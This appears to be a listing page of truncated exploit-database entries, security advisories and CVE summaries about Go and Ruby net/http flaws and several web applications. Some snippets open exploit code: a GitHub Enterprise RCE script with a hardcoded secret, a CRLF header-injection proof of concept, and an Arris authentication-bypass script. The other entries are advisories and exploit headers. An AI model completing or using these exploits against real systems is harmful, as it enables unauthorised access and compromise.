GitHub Enterprise 2.8.0 2.8.6 - Remote Code Execution

GitHub Enterprise 2.8.0 2.8.6 - Remote Code Execution !/usr/bin/ruby require "openssl" require "cgi" require "net/http" require "uri" SECRET = "641dd6454584ddabfed6342cc66281fb" puts ' . . ' puts ' \ | | | ' puts '/ \\ / /\ \ | | | | | / \ ' puts '\ / /\ \ / /// \ ' puts ' / / / / / '...

GitHub Enterprise 2.8.0 < 2.8.6 - Remote Code Execution

!/usr/bin/ruby require "openssl" require "cgi" require "net/http" require "uri" SECRET = "641dd6454584ddabfed6342cc66281fb" puts ' . . ' puts ' \ | | | ' puts '/ \\ / /\ \ | | | | | / \ ' puts '\ / /\ \ / /// \ ' puts ' / / / / / ' puts '' puts "github Enterprise RCE exploit" puts...

PageKit 1.0.10 - Password Reset

Exploit Title: Remote PageKit Password Reset Vulnerability Date:​21-01-2017 Software Link: http://pagekit.com/ Exploit Author: Saurabh Banawar from SecureLayer7​ Contact: http://twitter.com/​securelayer7 Website: http​s://securelayer7.net​ Category: webapps 1. Description Anyremote user can reset...

MGASA-2017-0019 Updated golang package fixes security vulnerability

The net/http package's Request.ParseMultipartForm method starts writing to temporary files once the request body size surpasses the given "maxMemory" limit. It was possible for an attacker to generate a multipart request crafted such that the server ran out of file descriptors...

Amazon Linux AMI : golang (ALAS-2016-731) (httpoxy)

An input-validation flaw was discovered in the Go programming language built in CGI implementation, which set the environment variable 'HTTPPROXY' using the incoming 'Proxy' HTTP-request header. The environment variable 'HTTPPROXY' is used by numerous web clients, including Go's net/http package,...

golang: HTTP request smuggling in net/http library

HTTP-request vulnerabilities have been found in the Golang net/http and net/textproto libraries. Request headers with double Content-Length fields do not generate a 400 error the second field is ignored, and invalid fields are parsed as valid for example, "Content Length:" with a space in the...

golang: HTTP request smuggling in net/http library

HTTP-request vulnerabilities have been found in the Golang net/http and net/textproto libraries. Request headers with double Content-Length fields do not generate a 400 error the second field is ignored, and invalid fields are parsed as valid for example, "Content Length:" with a space in the...

CVE-2016-5386

The net/http package in Go through 1.6 does not attempt to address RFC 3875 section 4.1.18 namespace conflicts and therefore does not protect CGI applications from the presence of untrusted client data in the HTTPPROXY environment variable, which might allow remote attackers to redirect a CGI...

CVE-2016-5386

Summary: CVE-2016-5386 is the httpoxy vulnerability in Go’s net/http CGI handling up to Go 1.6, where untrusted data in the HTTP_PROXY environment variable could redirect a CGI app’s outbound traffic to an attacker-controlled proxy via a crafted Proxy header. This is triggered by namespace confli...

UBUNTU-CVE-2016-5386

The net/http package in Go through 1.6 does not attempt to address RFC 3875 section 4.1.18 namespace conflicts and therefore does not protect CGI applications from the presence of untrusted client data in the HTTPPROXY environment variable, which might allow remote attackers to redirect a CGI...

The complete guide to Go net/http timeouts

I got an occasion to do a deep dive into net/http recently, and wrote a post about all the different timeouts you can set on the client and server side. How they work, how they interact and how to use them. The complete guide to Go net/http timeouts | CloudFlare Blog archive...

Ruby HTTP Header Injection

TIMELINE rootredrain submitted a report to Ruby. show raw Jun 22nd Hi, I would like to report a HTTP Header injection vulnerability in 'net/http' that allows attackers to inject arbitrary headers in request even create a new evil request. PoC require 'net/http' http =...

Ruby: Ruby:HTTP Header injection in 'net/http'

Hi, I would like to report a HTTP Header injection vulnerability in 'net/http' that allows attackers to inject arbitrary headers in request even create a new evil request. PoC require 'net/http' http = Net::HTTP.new'192.168.30.214','80' res = http.get"/r.php HTTP/1.1\r\nx-injection: memeda" F1009...

Airia - Arbitrary File Upload

Airia - Arbitrary File Upload Exploit Title: Airia - Webshell Upload Vulnerability Date: 2016-06-20 Exploit Author: HaHwul Exploit Author Blog: www.hahwul.com Vendor Homepage: http://ytyng.com Software Link: https://github.com/ytyng/airia/archive/master.zip Version: Latest commit Tested on: Debia...

JMX2 Email Tester - save_email.php Arbitrary File Upload Exploit

Exploit for multiple platform in category web applications Exploit Title: JMX2 Email Tester - Web Shell Uploadsaveemail.php Date: 2016-02-15 Blog: http://www.hahwul.com Vendor Homepage: https://github.com/johnfmorton/jmx2-Email-Tester Software Link:...

Amazon Linux: Security Advisory (ALAS-2015-588)

The remote host is missing an update for the SPDX-FileCopyrightText: 2015 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only ifdescription...

YesWiki 0.2 - 'squelette' Directory Traversal

Exploit Title: YESWIKI 0.2 - Path Traversal Date: 2015-09-02 Exploit Author: HaHwul Exploit Author Blog: http://www.codeblack.net Vendor Homepage: http://yeswiki.net Software Link: https://github.com/YesWiki/yeswiki Version: yeswiki 0.2 Tested on: Debian Wheezy CVE : none...

Fedora 22 : golang-1.4.2-3.fc22 (2015-13002)

security fixes for net/http smuggling Note that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues. %NASLMINLEVEL...

Arris VAP2500 - Authentication Bypass

!/usr/bin/env ruby require 'net/http' require 'digest/md5' if !ARGV0 puts "Usage: $0 " exit0 end host = ARGV0 newpass = "h4x0r3d!" http = Net::HTTP.newhost.start users = nil users = http.requestget"/admin.conf".body.split"\n".map! |user| user.sub/^.?,.$/,"\1" if users puts " found user accounts:...

Alibaba Clone <= 3.0 (Special) - SQL Injection Vulnerability Exploit

No description provided by source. ----------------------------Information------------------------------------------------ +Name : Alibaba Clone Version = 3.0 Special SQL Injection Vulnerability Exploit +Autor : Easy Laster +ICQ : 11-051-551 +Date : 09.05.2010 +Script : Alibaba Clone Version 3.0...